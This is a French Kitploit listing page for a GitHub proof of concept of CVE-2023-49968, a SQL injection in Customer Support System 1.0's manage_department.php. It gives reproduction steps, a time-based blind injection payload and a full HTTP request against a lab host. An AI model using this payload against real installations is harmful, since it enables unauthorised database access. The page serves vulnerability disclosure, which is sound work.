Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-49968 — Customer Support System 1.0 - Vulnérabilité d'injection SQL dans manage_department.php via le paramètre d'URL "id" | Kitploit
Outils/GitHubGitHub/geraldoalcantara/cve-2023-49968
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionSécurité des Bases de Données
GitHubgeraldoalcantara/cve-2023-49968

CVE-2023-49968

Customer Support System 1.0 - Vulnérabilité d'injection SQL dans manage_department.php via le paramètre d'URL "id"

Voir le dépôt
1il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-49968

Customer Support System 1.0 - Vulnérabilité d'injection SQL dans manage_department.php via le paramètre URL "id"

Description : Une vulnérabilité d'injection SQL existe dans la version 1 du Customer Support System. Un attaquant malveillant peut exécuter des commandes SQL sur la base de données MySQL en manipulant le paramètre URL 'id' lors de l'édition d'un département.

Version du produit vulnérable : Customer Support System 1.0
Auteur CVE : Geraldo Alcântara
Date : 28/11/2023
Confirmé le : 19/12/2023
CVE : CVE-2023-49968
Testé sur : Windows

Étapes pour reproduire :

1- Connectez-vous à l'application.
2- Accédez à la page d'édition du département, cliquez sur le bouton "Action" et sélectionnez "Edit".
3- Le paramètre 'id' sera passé, permettant l'insertion d'une charge utile malveillante. payload : (select*from(select(sleep(5)))a)

Requête :

root@kitploit:~
GET /customer_support/manage_department.php?id=(select*from(select(sleep(5)))a) HTTP/1.1
Host: 192.168.68.182
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: */*
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://192.168.68.182/customer_support/index.php?page=department_list
Cookie: PHPSESSID=arlocktakq815fq1lpm5fjml9n

Découvreur(s)/Crédits :
Geraldo Alcântara

Télécharger l’outil